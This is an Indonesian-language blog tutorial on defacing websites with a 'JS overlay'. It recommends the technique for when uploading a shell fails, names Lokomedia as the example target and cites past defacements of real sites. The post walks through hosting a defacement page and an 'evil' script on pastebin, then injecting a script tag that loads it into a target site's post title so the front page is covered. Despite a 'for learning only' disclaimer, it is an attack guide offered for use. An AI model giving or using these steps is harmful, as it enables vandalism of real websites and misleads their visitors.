Tutorial Deface - Menutup Halaman Depan Situs Target dengan JS Overlay

Tutorial Deface - Menutup Halaman Depan Situs Target dengan JS Overlay

12.57
Kali ini saya akan share teknik deface yang "jarang" digunakan karena ini mungkin menjadi alternatif terakhir jika kita gagal memasang shell pada web target. Ada kalanya sebuah web tidak support file php [kalo ini masih bisa di tamper], atau Web tersebut tidak menyediakan fasilitas upload. Cara yang bisa kita pakai adalah menutup halaman depan dengan sebuah "evil" javascript. Teknik ini pernah digunakan saat situs 1CAK, Babymetal, dan IPB di deface.
Sistem kerjanya berbeda dengan teknik deface yang didahului dengan mengupload shell. Jika shell diupload, maka biasanya script asli yang diganti. Namun untuk JS Overlay, halaman asli web tersebut "ditimpa" oleh halaman deface yang kita buat. Jadi halaman asli tersebut tetap ada namun ditutup oleh script deface kita. Caranya ?
Sebelumnya kalian membutuhkan script deface yang sudah tertanam di web lain. Jika sebelumnya belum pernah melakukan deface, kalian bisa mengupload di hosting kalian. Ini hanya untuk "umpan" agar tampilan deface kita tampil di web target.
Selain source script deface, kalian juga membutuhkan evil script yang tertanam di web lain. Bisa diupload juga di pastebin.

pastebin

Silahkan modifikasi sendiri bagian "Hacked by" dan source deface nya. Disini saya menggunakan script yang sudah termirror di zone-h.org .
(edit bagian : http://zonehmirrors.org/defaced/2016/10/22/msdental.com.br/msdental.com.br/k.php)

Sebagai contoh, target kita kali ini adalah Lokomedia. Seharusnya bisa upload shell. namun sudah saya coba berkali-kali tidak bisa. Mungkin sudah diantisipasi oleh Webmasternya. Makanya saya coba menggunakan metode JS Overlay.

Oke, kita mulai tutorialnya :
Login ke web target. Buat post baru/kalian bisa mengedit judul/nama dari web tersebut.
Masukkan script ini di bagian judul :
<script type="text/javascript" src="http://pastebin.com/raw/Za6HM0qL"></script>
Untuk tulisan berwarna merah silahkan diganti dengan url kalian sendiri. Intinya kita memanggil script dari url tersebut untuk menutupi halaman yang akan kita deface.
Setelah di save, kita coba buka situs yang telah di tanam script js overlay tadi.
ez pwn. :p
Teknik ini bisa digunakan di semua CMS. Entah itu Lokomedia, Joomla, WP, dll.
Kekurangannya, kita tidak punya akses ke server karena tidak ada backdoor yang tertanam.

Thanks to BagsFreakz from Surabaya Blackhat .
Tutorial ini hanya sebagai pembelajaran. Gunakan sebaik-baiknya. Resiko tanggung dewe.
Sumber :: linuxsec


Share this :

percetakanrepublik.com

Next
« Prev Post
Previous
Next Post »
0 Komentar

Penulisan markup di komentar
  • Silakan tinggalkan komentar sesuai topik. Komentar yang menyertakan link aktif, iklan, atau sejenisnya akan dihapus.
  • Untuk menyisipkan kode gunakan <i rel="code"> kode yang akan disisipkan </i>
  • Untuk menyisipkan kode panjang gunakan <i rel="pre"> kode yang akan disisipkan </i>
  • Untuk menyisipkan quote gunakan <i rel="quote"> catatan anda </i>
  • Untuk menyisipkan gambar gunakan <i rel="image"> URL gambar </i>
  • Untuk menyisipkan video gunakan [iframe] URL embed video [/iframe]
  • Kemudian parse kode tersebut pada kotak di bawah ini
  • © 2015 Simple SEO ✔

Langganan: Posting Komentar (Atom)